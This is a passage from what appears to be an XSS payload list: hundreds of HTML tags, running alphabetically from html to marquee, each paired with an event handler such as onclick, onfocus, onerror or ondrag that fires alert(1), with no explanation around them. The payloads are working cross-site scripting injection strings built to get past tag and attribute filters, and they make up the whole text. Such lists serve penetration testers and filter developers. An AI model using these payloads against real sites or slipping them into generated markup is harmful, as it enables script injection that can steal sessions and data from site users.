autofocus> <html onclick="alert(1)">test</html> <html oncontextmenu="alert(1)">test</html> <html oncopy="alert(1)" contenteditable>test</html> <html oncut="alert(1)" contenteditable>test</html> <html ondblclick="alert(1)">test</html> <html onfocusout=alert(1) tabindex=1 id=x></html><input autofocus> <html onkeydown="alert(1)" contenteditable>test</html> <html onkeypress="alert(1)" contenteditable>test</html> <html onkeyup="alert(1)" contenteditable>test</html> <html onmousedown="alert(1)">test</html> <html onmouseenter="alert(1)">test</html> <html onmouseleave="alert(1)">test</html> <html onmousemove="alert(1)">test</html> <html onmouseout="alert(1)">test</html> <html onmouseover="alert(1)">test</html> <html onmouseup="alert(1)">test</html> <html onpaste="alert(1)" contenteditable>test</html> <i draggable="true" ondrag="alert(1)">test</i> <i draggable="true" ondragend="alert(1)">test</i> <i draggable="true" ondragenter="alert(1)">test</i> <i draggable="true" ondragleave="alert(1)">test</i> <i draggable="true" ondragstart="alert(1)">test</i> <i id=x tabindex=1 onactivate=alert(1)></i> <i id=x tabindex=1 onbeforeactivate=alert(1)></i> <i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus> <i id=x tabindex=1 ondeactivate=alert(1)></i><input id=y autofocus> <i id=x tabindex=1 onfocus=alert(1)></i> <i id=x tabindex=1 onfocusin=alert(1)></i> <i onbeforecopy="alert(1)" contenteditable>test</i> <i onbeforecut="alert(1)" contenteditable>test</i> <i onbeforepaste="alert(1)" contenteditable>test</i> <i onblur=alert(1) tabindex=1 id=x></i><input autofocus> <i onclick="alert(1)">test</i> <i oncontextmenu="alert(1)">test</i> <i oncopy="alert(1)" contenteditable>test</i> <i oncut="alert(1)" contenteditable>test</i> <i ondblclick="alert(1)">test</i> <i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus> <i onkeydown="alert(1)" contenteditable>test</i> <i onkeypress="alert(1)" contenteditable>test</i> <i onkeyup="alert(1)" contenteditable>test</i> <i onmousedown="alert(1)">test</i> <i onmouseenter="alert(1)">test</i> <i onmouseleave="alert(1)">test</i> <i onmousemove="alert(1)">test</i> <i onmouseout="alert(1)">test</i> <i onmouseover="alert(1)">test</i> <i onmouseup="alert(1)">test</i> <i onpaste="alert(1)" contenteditable>test</i> <iframe draggable="true" ondrag="alert(1)">test</iframe> <iframe draggable="true" ondragend="alert(1)">test</iframe> <iframe draggable="true" ondragenter="alert(1)">test</iframe> <iframe draggable="true" ondragleave="alert(1)">test</iframe> <iframe draggable="true" ondragstart="alert(1)">test</iframe> <iframe id=x onfocus=alert(1)> <iframe id=x onfocusin=alert(1)> <iframe id=x tabindex=1 onactivate=alert(1)></iframe> <iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe> <iframe id=x tabindex=1 onbeforedeactivate=alert(1)></iframe><input autofocus> <iframe id=x tabindex=1 ondeactivate=alert(1)></iframe><input id=y autofocus> <iframe onbeforecopy="alert(1)" contenteditable>test</iframe> <iframe onbeforecut="alert(1)" contenteditable>test</iframe> <iframe onbeforepaste="alert(1)" contenteditable>test</iframe> <iframe onblur=alert(1) id=x><input autofocus> <iframe onclick="alert(1)">test</iframe> <iframe oncontextmenu="alert(1)">test</iframe> <iframe oncopy="alert(1)" contenteditable>test</iframe> <iframe oncut="alert(1)" contenteditable>test</iframe> <iframe ondblclick="alert(1)">test</iframe> <iframe onfocusout=alert(1) id=x><input autofocus> <iframe onkeydown="alert(1)" contenteditable>test</iframe> <iframe onkeypress="alert(1)" contenteditable>test</iframe> <iframe onkeyup="alert(1)" contenteditable>test</iframe> <iframe onload=alert(1)></iframe> <iframe onmousedown="alert(1)">test</iframe> <iframe onmouseenter="alert(1)">test</iframe> <iframe onmouseleave="alert(1)">test</iframe> <iframe onmousemove="alert(1)">test</iframe> <iframe onmouseout="alert(1)">test</iframe> <iframe onmouseover="alert(1)">test</iframe> <iframe onmouseup="alert(1)">test</iframe> <iframe onpaste="alert(1)" contenteditable>test</iframe> <iframe onreadystatechange=alert(1)></iframe> <image draggable="true" ondrag="alert(1)">test</image> <image draggable="true" ondragend="alert(1)">test</image> <image draggable="true" ondragenter="alert(1)">test</image> <image draggable="true" ondragleave="alert(1)">test</image> <image draggable="true" ondragstart="alert(1)">test</image> <image id=x tabindex=1 onactivate=alert(1)></image> <image id=x tabindex=1 onbeforeactivate=alert(1)></image> <image id=x tabindex=1 onbeforedeactivate=alert(1)></image><input autofocus> <image id=x tabindex=1 ondeactivate=alert(1)></image><input id=y autofocus> <image id=x tabindex=1 onfocus=alert(1)></image> <image id=x tabindex=1 onfocusin=alert(1)></image> <image onbeforecopy="alert(1)" contenteditable>test</image> <image onbeforecut="alert(1)" contenteditable>test</image> <image onbeforepaste="alert(1)" contenteditable>test</image> <image onblur=alert(1) tabindex=1 id=x></image><input autofocus> <image onclick="alert(1)">test</image> <image oncontextmenu="alert(1)">test</image> <image oncopy="alert(1)" contenteditable>test</image> <image oncut="alert(1)" contenteditable>test</image> <image ondblclick="alert(1)">test</image> <image onfocusout=alert(1) tabindex=1 id=x></image><input autofocus> <image onkeydown="alert(1)" contenteditable>test</image> <image onkeypress="alert(1)" contenteditable>test</image> <image onkeyup="alert(1)" contenteditable>test</image> <image onmousedown="alert(1)">test</image> <image onmouseenter="alert(1)">test</image> <image onmouseleave="alert(1)">test</image> <image onmousemove="alert(1)">test</image> <image onmouseout="alert(1)">test</image> <image onmouseover="alert(1)">test</image> <image onmouseup="alert(1)">test</image> <image onpaste="alert(1)" contenteditable>test</image> <image src/onerror=alert(1)> <image src=validimage.png onload=alert(1)> <image src=validimage.png onloadend=alert(1)> <image src=validimage.png onloadstart=alert(1)> <image srcset=1 onerror=alert(1)> <img draggable="true" ondrag="alert(1)">test</img> <img draggable="true" ondragend="alert(1)">test</img> <img draggable="true" ondragenter="alert(1)">test</img> <img draggable="true" ondragleave="alert(1)">test</img> <img draggable="true" ondragstart="alert(1)">test</img> <img id=x tabindex=1 onactivate=alert(1)></img> <img id=x tabindex=1 onbeforeactivate=alert(1)></img> <img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus> <img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus> <img id=x tabindex=1 onfocus=alert(1)></img> <img id=x tabindex=1 onfocusin=alert(1)></img> <img onbeforecopy="alert(1)" contenteditable>test</img> <img onbeforecut="alert(1)" contenteditable>test</img> <img onbeforepaste="alert(1)" contenteditable>test</img> <img onblur=alert(1) tabindex=1 id=x></img><input autofocus> <img onclick="alert(1)">test</img> <img oncontextmenu="alert(1)">test</img> <img oncopy="alert(1)" contenteditable>test</img> <img oncut="alert(1)" contenteditable>test</img> <img ondblclick="alert(1)">test</img> <img onfocusout=alert(1) tabindex=1 id=x></img><input autofocus> <img onkeydown="alert(1)" contenteditable>test</img> <img onkeypress="alert(1)" contenteditable>test</img> <img onkeyup="alert(1)" contenteditable>test</img> <img onmousedown="alert(1)">test</img> <img onmouseenter="alert(1)">test</img> <img onmouseleave="alert(1)">test</img> <img onmousemove="alert(1)">test</img> <img onmouseout="alert(1)">test</img> <img onmouseover="alert(1)">test</img> <img onmouseup="alert(1)">test</img> <img onpaste="alert(1)" contenteditable>test</img> <img src/onerror=alert(1)> <img src=validimage.png onload=alert(1)> <img src=validimage.png onloadend=alert(1)> <img src=validimage.png onloadstart=alert(1)> <img srcset=1 onerror=alert(1)> <img srcset=validimage.png onload=alert(1)> <img usemap=#x><map name="x"><area href onfocus=alert(1) id=x> <img usemap=#x><map name="x"><area href onfocusin=alert(1) id=x> <input autofocus onfocus=alert(1)> <input autofocus onfocusin=alert(1)> <input draggable="true" ondrag="alert(1)">test</input> <input draggable="true" ondragend="alert(1)">test</input> <input draggable="true" ondragenter="alert(1)">test</input> <input draggable="true" ondragleave="alert(1)">test</input> <input draggable="true" ondragstart="alert(1)">test</input> <input id=x onfocus=alert(1)> <input id=x onfocusin=alert(1)> <input id=x tabindex=1 onactivate=alert(1)></input> <input id=x tabindex=1 onbeforeactivate=alert(1)></input> <input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus> <input id=x tabindex=1 ondeactivate=alert(1)></input><input id=y autofocus> <input onauxclick=alert(1)> <input onbeforecopy=alert(1) value="XSS" autofocus> <input onbeforecut=alert(1) value="XSS" autofocus> <input onbeforepaste=alert(1) value="" autofocus> <input onblur=alert(1) id=x><input autofocus> <input onchange=alert(1) value=xss> <input onclick="alert(1)">test</input> <input oncontextmenu="alert(1)">test</input> <input oncopy=alert(1) value="XSS" autofocus> <input oncut=alert(1) value="XSS" autofocus> <input ondblclick="alert(1)">test</input> <input onfocusout=alert(1) id=x><input autofocus> <input oninput=alert(1) value=xss> <input onkeydown="alert(1)" contenteditable>test</input> <input onkeypress="alert(1)" contenteditable>test</input> <input onkeyup="alert(1)" contenteditable>test</input> <input onmousedown="alert(1)">test</input> <input onmouseenter="alert(1)">test</input> <input onmouseleave="alert(1)">test</input> <input onmousemove="alert(1)">test</input> <input onmouseout="alert(1)">test</input> <input onmouseover="alert(1)">test</input> <input onmouseup="alert(1)">test</input> <input onpaste=alert(1) value="" autofocus> <input onselect=alert(1) value="XSS" autofocus> <input type=checkbox id=x onfocus=alert(1)> <input type=checkbox id=x onfocusin=alert(1)> <input type=image onloadend=alert(1) src=validimage.png> <input type=image onloadstart=alert(1) src=validimage.png> <input type=image src=1 onerror=alert(1)> <input type=image src=validimage.png onload=alert(1)> <input type=radio id=x onfocus=alert(1)> <input type=radio id=x onfocusin=alert(1)> <ins draggable="true" ondrag="alert(1)">test</ins> <ins draggable="true" ondragend="alert(1)">test</ins> <ins draggable="true" ondragenter="alert(1)">test</ins> <ins draggable="true" ondragleave="alert(1)">test</ins> <ins draggable="true" ondragstart="alert(1)">test</ins> <ins id=x tabindex=1 onactivate=alert(1)></ins> <ins id=x tabindex=1 onbeforeactivate=alert(1)></ins> <ins id=x tabindex=1 onbeforedeactivate=alert(1)></ins><input autofocus> <ins id=x tabindex=1 ondeactivate=alert(1)></ins><input id=y autofocus> <ins id=x tabindex=1 onfocus=alert(1)></ins> <ins id=x tabindex=1 onfocusin=alert(1)></ins> <ins onbeforecopy="alert(1)" contenteditable>test</ins> <ins onbeforecut="alert(1)" contenteditable>test</ins> <ins onbeforepaste="alert(1)" contenteditable>test</ins> <ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus> <ins onclick="alert(1)">test</ins> <ins oncontextmenu="alert(1)">test</ins> <ins oncopy="alert(1)" contenteditable>test</ins> <ins oncut="alert(1)" contenteditable>test</ins> <ins ondblclick="alert(1)">test</ins> <ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus> <ins onkeydown="alert(1)" contenteditable>test</ins> <ins onkeypress="alert(1)" contenteditable>test</ins> <ins onkeyup="alert(1)" contenteditable>test</ins> <ins onmousedown="alert(1)">test</ins> <ins onmouseenter="alert(1)">test</ins> <ins onmouseleave="alert(1)">test</ins> <ins onmousemove="alert(1)">test</ins> <ins onmouseout="alert(1)">test</ins> <ins onmouseover="alert(1)">test</ins> <ins onmouseup="alert(1)">test</ins> <ins onpaste="alert(1)" contenteditable>test</ins> <isindex draggable="true" ondrag="alert(1)">test</isindex> <isindex draggable="true" ondragend="alert(1)">test</isindex> <isindex draggable="true" ondragenter="alert(1)">test</isindex> <isindex draggable="true" ondragleave="alert(1)">test</isindex> <isindex draggable="true" ondragstart="alert(1)">test</isindex> <isindex id=x tabindex=1 onactivate=alert(1)></isindex> <isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex> <isindex id=x tabindex=1 onbeforedeactivate=alert(1)></isindex><input autofocus> <isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus> <isindex id=x tabindex=1 onfocus=alert(1)></isindex> <isindex id=x tabindex=1 onfocusin=alert(1)></isindex> <isindex onbeforecopy="alert(1)" contenteditable>test</isindex> <isindex onbeforecut="alert(1)" contenteditable>test</isindex> <isindex onbeforepaste="alert(1)" contenteditable>test</isindex> <isindex onblur=alert(1) tabindex=1 id=x></isindex><input autofocus> <isindex onclick="alert(1)">test</isindex> <isindex oncontextmenu="alert(1)">test</isindex> <isindex oncopy="alert(1)" contenteditable>test</isindex> <isindex oncut="alert(1)" contenteditable>test</isindex> <isindex ondblclick="alert(1)">test</isindex> <isindex onfocusout=alert(1) tabindex=1 id=x></isindex><input autofocus> <isindex onkeydown="alert(1)" contenteditable>test</isindex> <isindex onkeypress="alert(1)" contenteditable>test</isindex> <isindex onkeyup="alert(1)" contenteditable>test</isindex> <isindex onmousedown="alert(1)">test</isindex> <isindex onmouseenter="alert(1)">test</isindex> <isindex onmouseleave="alert(1)">test</isindex> <isindex onmousemove="alert(1)">test</isindex> <isindex onmouseout="alert(1)">test</isindex> <isindex onmouseover="alert(1)">test</isindex> <isindex onmouseup="alert(1)">test</isindex> <isindex onpaste="alert(1)" contenteditable>test</isindex> <isindex type=image onload=alert(1) src=validimage.png> <isindex type=image src=1 onerror=alert(1)> <kbd draggable="true" ondrag="alert(1)">test</kbd> <kbd draggable="true" ondragend="alert(1)">test</kbd> <kbd draggable="true" ondragenter="alert(1)">test</kbd> <kbd draggable="true" ondragleave="alert(1)">test</kbd> <kbd draggable="true" ondragstart="alert(1)">test</kbd> <kbd id=x tabindex=1 onactivate=alert(1)></kbd> <kbd id=x tabindex=1 onbeforeactivate=alert(1)></kbd> <kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus> <kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><input id=y autofocus> <kbd id=x tabindex=1 onfocus=alert(1)></kbd> <kbd id=x tabindex=1 onfocusin=alert(1)></kbd> <kbd onbeforecopy="alert(1)" contenteditable>test</kbd> <kbd onbeforecut="alert(1)" contenteditable>test</kbd> <kbd onbeforepaste="alert(1)" contenteditable>test</kbd> <kbd onblur=alert(1) tabindex=1 id=x></kbd><input autofocus> <kbd onclick="alert(1)">test</kbd> <kbd oncontextmenu="alert(1)">test</kbd> <kbd oncopy="alert(1)" contenteditable>test</kbd> <kbd oncut="alert(1)" contenteditable>test</kbd> <kbd ondblclick="alert(1)">test</kbd> <kbd onfocusout=alert(1) tabindex=1 id=x></kbd><input autofocus> <kbd onkeydown="alert(1)" contenteditable>test</kbd> <kbd onkeypress="alert(1)" contenteditable>test</kbd> <kbd onkeyup="alert(1)" contenteditable>test</kbd> <kbd onmousedown="alert(1)">test</kbd> <kbd onmouseenter="alert(1)">test</kbd> <kbd onmouseleave="alert(1)">test</kbd> <kbd onmousemove="alert(1)">test</kbd> <kbd onmouseout="alert(1)">test</kbd> <kbd onmouseover="alert(1)">test</kbd> <kbd onmouseup="alert(1)">test</kbd> <kbd onpaste="alert(1)" contenteditable>test</kbd> <keygen autofocus onfocus=alert(1)> <keygen autofocus onfocusin=alert(1)> <keygen draggable="true" ondrag="alert(1)">test</keygen> <keygen draggable="true" ondragend="alert(1)">test</keygen> <keygen draggable="true" ondragenter="alert(1)">test</keygen> <keygen draggable="true" ondragleave="alert(1)">test</keygen> <keygen draggable="true" ondragstart="alert(1)">test</keygen> <keygen id=x onfocus=alert(1)> <keygen id=x onfocusin=alert(1)> <keygen id=x tabindex=1 onactivate=alert(1)></keygen> <keygen id=x tabindex=1 onbeforeactivate=alert(1)></keygen> <keygen id=x tabindex=1 onbeforedeactivate=alert(1)></keygen><input autofocus> <keygen id=x tabindex=1 ondeactivate=alert(1)></keygen><input id=y autofocus> <keygen onbeforecopy="alert(1)" contenteditable>test</keygen> <keygen onbeforecut="alert(1)" contenteditable>test</keygen> <keygen onbeforepaste="alert(1)" contenteditable>test</keygen> <keygen onblur=alert(1) tabindex=1 id=x></keygen><input autofocus> <keygen onclick="alert(1)">test</keygen> <keygen oncontextmenu="alert(1)">test</keygen> <keygen oncopy="alert(1)" contenteditable>test</keygen> <keygen oncut="alert(1)" contenteditable>test</keygen> <keygen ondblclick="alert(1)">test</keygen> <keygen onfocusout=alert(1) tabindex=1 id=x></keygen><input autofocus> <keygen onkeydown="alert(1)" contenteditable>test</keygen> <keygen onkeypress="alert(1)" contenteditable>test</keygen> <keygen onkeyup="alert(1)" contenteditable>test</keygen> <keygen onmousedown="alert(1)">test</keygen> <keygen onmouseenter="alert(1)">test</keygen> <keygen onmouseleave="alert(1)">test</keygen> <keygen onmousemove="alert(1)">test</keygen> <keygen onmouseout="alert(1)">test</keygen> <keygen onmouseover="alert(1)">test</keygen> <keygen onmouseup="alert(1)">test</keygen> <keygen onpaste="alert(1)" contenteditable>test</keygen> <label draggable="true" ondrag="alert(1)">test</label> <label draggable="true" ondragend="alert(1)">test</label> <label draggable="true" ondragenter="alert(1)">test</label> <label draggable="true" ondragleave="alert(1)">test</label> <label draggable="true" ondragstart="alert(1)">test</label> <label id=x tabindex=1 onactivate=alert(1)></label> <label id=x tabindex=1 onbeforeactivate=alert(1)></label> <label id=x tabindex=1 onbeforedeactivate=alert(1)></label><input autofocus> <label id=x tabindex=1 ondeactivate=alert(1)></label><input id=y autofocus> <label id=x tabindex=1 onfocus=alert(1)></label> <label id=x tabindex=1 onfocusin=alert(1)></label> <label onbeforecopy="alert(1)" contenteditable>test</label> <label onbeforecut="alert(1)" contenteditable>test</label> <label onbeforepaste="alert(1)" contenteditable>test</label> <label onblur=alert(1) tabindex=1 id=x></label><input autofocus> <label onclick="alert(1)">test</label> <label oncontextmenu="alert(1)">test</label> <label oncopy="alert(1)" contenteditable>test</label> <label oncut="alert(1)" contenteditable>test</label> <label ondblclick="alert(1)">test</label> <label onfocusout=alert(1) tabindex=1 id=x></label><input autofocus> <label onkeydown="alert(1)" contenteditable>test</label> <label onkeypress="alert(1)" contenteditable>test</label> <label onkeyup="alert(1)" contenteditable>test</label> <label onmousedown="alert(1)">test</label> <label onmouseenter="alert(1)">test</label> <label onmouseleave="alert(1)">test</label> <label onmousemove="alert(1)">test</label> <label onmouseout="alert(1)">test</label> <label onmouseover="alert(1)">test</label> <label onmouseup="alert(1)">test</label> <label onpaste="alert(1)" contenteditable>test</label> <legend draggable="true" ondrag="alert(1)">test</legend> <legend draggable="true" ondragend="alert(1)">test</legend> <legend draggable="true" ondragenter="alert(1)">test</legend> <legend draggable="true" ondragleave="alert(1)">test</legend> <legend draggable="true" ondragstart="alert(1)">test</legend> <legend id=x tabindex=1 onactivate=alert(1)></legend> <legend id=x tabindex=1 onbeforeactivate=alert(1)></legend> <legend id=x tabindex=1 onbeforedeactivate=alert(1)></legend><input autofocus> <legend id=x tabindex=1 ondeactivate=alert(1)></legend><input id=y autofocus> <legend id=x tabindex=1 onfocus=alert(1)></legend> <legend id=x tabindex=1 onfocusin=alert(1)></legend> <legend onbeforecopy="alert(1)" contenteditable>test</legend> <legend onbeforecut="alert(1)" contenteditable>test</legend> <legend onbeforepaste="alert(1)" contenteditable>test</legend> <legend onblur=alert(1) tabindex=1 id=x></legend><input autofocus> <legend onclick="alert(1)">test</legend> <legend oncontextmenu="alert(1)">test</legend> <legend oncopy="alert(1)" contenteditable>test</legend> <legend oncut="alert(1)" contenteditable>test</legend> <legend ondblclick="alert(1)">test</legend> <legend onfocusout=alert(1) tabindex=1 id=x></legend><input autofocus> <legend onkeydown="alert(1)" contenteditable>test</legend> <legend onkeypress="alert(1)" contenteditable>test</legend> <legend onkeyup="alert(1)" contenteditable>test</legend> <legend onmousedown="alert(1)">test</legend> <legend onmouseenter="alert(1)">test</legend> <legend onmouseleave="alert(1)">test</legend> <legend onmousemove="alert(1)">test</legend> <legend onmouseout="alert(1)">test</legend> <legend onmouseover="alert(1)">test</legend> <legend onmouseup="alert(1)">test</legend> <legend onpaste="alert(1)" contenteditable>test</legend> <li draggable="true" ondrag="alert(1)">test</li> <li draggable="true" ondragend="alert(1)">test</li> <li draggable="true" ondragenter="alert(1)">test</li> <li draggable="true" ondragleave="alert(1)">test</li> <li draggable="true" ondragstart="alert(1)">test</li> <li id=x tabindex=1 onactivate=alert(1)></li> <li id=x tabindex=1 onbeforeactivate=alert(1)></li> <li id=x tabindex=1 onbeforedeactivate=alert(1)></li><input autofocus> <li id=x tabindex=1 ondeactivate=alert(1)></li><input id=y autofocus> <li id=x tabindex=1 onfocus=alert(1)></li> <li id=x tabindex=1 onfocusin=alert(1)></li> <li onbeforecopy="alert(1)" contenteditable>test</li> <li onbeforecut="alert(1)" contenteditable>test</li> <li onbeforepaste="alert(1)" contenteditable>test</li> <li onblur=alert(1) tabindex=1 id=x></li><input autofocus> <li onclick="alert(1)">test</li> <li oncontextmenu="alert(1)">test</li> <li oncopy="alert(1)" contenteditable>test</li> <li oncut="alert(1)" contenteditable>test</li> <li ondblclick="alert(1)">test</li> <li onfocusout=alert(1) tabindex=1 id=x></li><input autofocus> <li onkeydown="alert(1)" contenteditable>test</li> <li onkeypress="alert(1)" contenteditable>test</li> <li onkeyup="alert(1)" contenteditable>test</li> <li onmousedown="alert(1)">test</li> <li onmouseenter="alert(1)">test</li> <li onmouseleave="alert(1)">test</li> <li onmousemove="alert(1)">test</li> <li onmouseout="alert(1)">test</li> <li onmouseover="alert(1)">test</li> <li onmouseup="alert(1)">test</li> <li onpaste="alert(1)" contenteditable>test</li> <link draggable="true" ondrag="alert(1)">test</link> <link draggable="true" ondragend="alert(1)">test</link> <link draggable="true" ondragenter="alert(1)">test</link> <link draggable="true" ondragleave="alert(1)">test</link> <link draggable="true" ondragstart="alert(1)">test</link> <link href=validstyles.css rel=stylesheet onload=alert(1)> <link id=x tabindex=1 onactivate=alert(1)></link> <link id=x tabindex=1 onbeforeactivate=alert(1)></link> <link id=x tabindex=1 onbeforedeactivate=alert(1)></link><input autofocus> <link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus> <link onbeforecopy="alert(1)" contenteditable>test</link> <link onbeforecut="alert(1)" contenteditable>test</link> <link onbeforepaste="alert(1)" contenteditable>test</link> <link onblur=alert(1) tabindex=1 id=x></link><input autofocus> <link onclick="alert(1)">test</link> <link oncontextmenu="alert(1)">test</link> <link oncopy="alert(1)" contenteditable>test</link> <link oncut="alert(1)" contenteditable>test</link> <link ondblclick="alert(1)">test</link> <link onfocus=alert(1) id=x tabindex=1 style=display:block> <link onfocusin=alert(1) id=x tabindex=1 style=display:block> <link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus> <link onkeydown="alert(1)" contenteditable>test</link> <link onkeypress="alert(1)" contenteditable>test</link> <link onkeyup="alert(1)" contenteditable>test</link> <link onmousedown="alert(1)">test</link> <link onmouseenter="alert(1)">test</link> <link onmouseleave="alert(1)">test</link> <link onmousemove="alert(1)">test</link> <link onmouseout="alert(1)">test</link> <link onmouseover="alert(1)">test</link> <link onmouseup="alert(1)">test</link> <link onpaste="alert(1)" contenteditable>test</link> <link onreadystatechange=alert(1) rel=stylesheet href=1> <link rel=stylesheet href=1 onerror=alert(1)> <listing draggable="true" ondrag="alert(1)">test</listing> <listing draggable="true" ondragend="alert(1)">test</listing> <listing draggable="true" ondragenter="alert(1)">test</listing> <listing draggable="true" ondragleave="alert(1)">test</listing> <listing draggable="true" ondragstart="alert(1)">test</listing> <listing id=x tabindex=1 onactivate=alert(1)></listing> <listing id=x tabindex=1 onbeforeactivate=alert(1)></listing> <listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus> <listing id=x tabindex=1 ondeactivate=alert(1)></listing><input id=y autofocus> <listing id=x tabindex=1 onfocus=alert(1)></listing> <listing id=x tabindex=1 onfocusin=alert(1)></listing> <listing onbeforecopy="alert(1)" contenteditable>test</listing> <listing onbeforecut="alert(1)" contenteditable>test</listing> <listing onbeforepaste="alert(1)" contenteditable>test</listing> <listing onblur=alert(1) tabindex=1 id=x></listing><input autofocus> <listing onclick="alert(1)">test</listing> <listing oncontextmenu="alert(1)">test</listing> <listing oncopy="alert(1)" contenteditable>test</listing> <listing oncut="alert(1)" contenteditable>test</listing> <listing ondblclick="alert(1)">test</listing> <listing onfocusout=alert(1) tabindex=1 id=x></listing><input autofocus> <listing onkeydown="alert(1)" contenteditable>test</listing> <listing onkeypress="alert(1)" contenteditable>test</listing> <listing onkeyup="alert(1)" contenteditable>test</listing> <listing onmousedown="alert(1)">test</listing> <listing onmouseenter="alert(1)">test</listing> <listing onmouseleave="alert(1)">test</listing> <listing onmousemove="alert(1)">test</listing> <listing onmouseout="alert(1)">test</listing> <listing onmouseover="alert(1)">test</listing> <listing onmouseup="alert(1)">test</listing> <listing onpaste="alert(1)" contenteditable>test</listing> <main draggable="true" ondrag="alert(1)">test</main> <main draggable="true" ondragend="alert(1)">test</main> <main draggable="true" ondragenter="alert(1)">test</main> <main draggable="true" ondragleave="alert(1)">test</main> <main draggable="true" ondragstart="alert(1)">test</main> <main id=x tabindex=1 onactivate=alert(1)></main> <main id=x tabindex=1 onbeforeactivate=alert(1)></main> <main id=x tabindex=1 onbeforedeactivate=alert(1)></main><input autofocus> <main id=x tabindex=1 ondeactivate=alert(1)></main><input id=y autofocus> <main id=x tabindex=1 onfocus=alert(1)></main> <main id=x tabindex=1 onfocusin=alert(1)></main> <main onbeforecopy="alert(1)" contenteditable>test</main> <main onbeforecut="alert(1)" contenteditable>test</main> <main onbeforepaste="alert(1)" contenteditable>test</main> <main onblur=alert(1) tabindex=1 id=x></main><input autofocus> <main onclick="alert(1)">test</main> <main oncontextmenu="alert(1)">test</main> <main oncopy="alert(1)" contenteditable>test</main> <main oncut="alert(1)" contenteditable>test</main> <main ondblclick="alert(1)">test</main> <main onfocusout=alert(1) tabindex=1 id=x></main><input autofocus> <main onkeydown="alert(1)" contenteditable>test</main> <main onkeypress="alert(1)" contenteditable>test</main> <main onkeyup="alert(1)" contenteditable>test</main> <main onmousedown="alert(1)">test</main> <main onmouseenter="alert(1)">test</main> <main onmouseleave="alert(1)">test</main> <main onmousemove="alert(1)">test</main> <main onmouseout="alert(1)">test</main> <main onmouseover="alert(1)">test</main> <main onmouseup="alert(1)">test</main> <main onpaste="alert(1)" contenteditable>test</main> <map draggable="true" ondrag="alert(1)">test</map> <map draggable="true" ondragend="alert(1)">test</map> <map draggable="true" ondragenter="alert(1)">test</map> <map draggable="true" ondragleave="alert(1)">test</map> <map draggable="true" ondragstart="alert(1)">test</map> <map id=x tabindex=1 onactivate=alert(1)></map> <map id=x tabindex=1 onbeforeactivate=alert(1)></map> <map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus> <map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus> <map id=x tabindex=1 onfocus=alert(1)></map> <map id=x tabindex=1 onfocusin=alert(1)></map> <map onbeforecopy="alert(1)" contenteditable>test</map> <map onbeforecut="alert(1)" contenteditable>test</map> <map onbeforepaste="alert(1)" contenteditable>test</map> <map onblur=alert(1) tabindex=1 id=x></map><input autofocus> <map onclick="alert(1)">test</map> <map oncontextmenu="alert(1)">test</map> <map oncopy="alert(1)" contenteditable>test</map> <map oncut="alert(1)" contenteditable>test</map> <map ondblclick="alert(1)">test</map> <map onfocusout=alert(1) tabindex=1 id=x></map><input autofocus> <map onkeydown="alert(1)" contenteditable>test</map> <map onkeypress="alert(1)" contenteditable>test</map> <map onkeyup="alert(1)" contenteditable>test</map> <map onmousedown="alert(1)">test</map> <map onmouseenter="alert(1)">test</map> <map onmouseleave="alert(1)">test</map> <map onmousemove="alert(1)">test</map> <map onmouseout="alert(1)">test</map> <map onmouseover="alert(1)">test</map> <map onmouseup="alert(1)">test</map> <map onpaste="alert(1)" contenteditable>test</map> <mark draggable="true" ondrag="alert(1)">test</mark> <mark draggable="true" ondragend="alert(1)">test</mark> <mark draggable="true" ondragenter="alert(1)">test</mark> <mark draggable="true" ondragleave="alert(1)">test</mark> <mark draggable="true" ondragstart="alert(1)">test</mark> <mark id=x tabindex=1 onactivate=alert(1)></mark> <mark id=x tabindex=1 onbeforeactivate=alert(1)></mark> <mark id=x tabindex=1 onbeforedeactivate=alert(1)></mark><input autofocus> <mark id=x tabindex=1 ondeactivate=alert(1)></mark><input id=y autofocus> <mark id=x tabindex=1 onfocus=alert(1)></mark> <mark id=x tabindex=1 onfocusin=alert(1)></mark> <mark onbeforecopy="alert(1)" contenteditable>test</mark> <mark onbeforecut="alert(1)" contenteditable>test</mark> <mark onbeforepaste="alert(1)" contenteditable>test</mark> <mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus> <mark onclick="alert(1)">test</mark> <mark oncontextmenu="alert(1)">test</mark> <mark oncopy="alert(1)" contenteditable>test</mark> <mark oncut="alert(1)" contenteditable>test</mark> <mark ondblclick="alert(1)">test</mark> <mark onfocusout=alert(1) tabindex=1 id=x></mark><input autofocus> <mark onkeydown="alert(1)" contenteditable>test</mark> <mark onkeypress="alert(1)" contenteditable>test</mark> <mark onkeyup="alert(1)" contenteditable>test</mark> <mark onmousedown="alert(1)">test</mark> <mark onmouseenter="alert(1)">test</mark> <mark onmouseleave="alert(1)">test</mark> <mark onmousemove="alert(1)">test</mark> <mark onmouseout="alert(1)">test</mark> <mark onmouseover="alert(1)">test</mark> <mark onmouseup="alert(1)">test</mark> <mark onpaste="alert(1)" contenteditable>test</mark> <marquee draggable="true" ondrag="alert(1)">test</marquee> <marquee draggable="true" ondragend="alert(1)">test</marquee> <marquee draggable="true" ondragenter="alert(1)">test</marquee> <marquee draggable="true" ondragleave="alert(1)">test</marquee> <marquee draggable="true" ondragstart="alert(1)">test</marquee> <marquee id=x tabindex=1 onactivate=alert(1)></marquee> <marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee> <marquee id=x tabindex=1 onbeforedeactivate=alert(1)></marquee><input autofocus> <marquee id=x tabindex=1 ondeactivate=alert(1)></marquee><input id=y autofocus> <marquee id=x tabindex=1 onfocus=alert(1)></marquee> <marquee id=x tabindex=1 onfocusin=alert(1)></marquee> <marquee onbeforecopy="alert(1)" contenteditable>test</marquee> <marquee 